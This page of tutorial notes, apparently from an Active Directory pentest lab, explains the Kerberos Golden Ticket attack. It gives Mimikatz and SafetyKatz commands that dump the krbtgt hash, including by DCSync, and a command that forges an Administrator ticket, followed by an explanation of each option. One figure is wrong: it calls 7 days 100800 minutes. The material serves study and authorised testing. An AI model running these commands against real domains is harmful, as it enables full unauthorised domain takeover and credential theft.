Golden Ticket

Golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket.

Using Golden ticket can be used to impersonate any user with any privileges.

Obtain krbtgt hash

There are multiple ways to get the krbtgt account hash

# Execute on DC as Domain Admin
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# DCSync to get AES keys
# Needs Domain admin or Replication Rights
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<user_sid> /aes256:<aes_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

dir \\dcorp-dc\c$ # check if worked
Options

kerberos::golden

Name of the module

/User:Administrator

Username for which the TGT is generated

/domain:

Domain FQDN

/sid:

SID of the domain

/aes256:

AES256 keys of the krbtgt account

/id:500 /groups:512

Optional User and Group RID

/ptt or /ticket

ptt: inject ticket to current process ticket: saves ticket to a file

/startoffset:0

Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.

/endin:600

Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes

/renewmax:10080

Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800

Last updated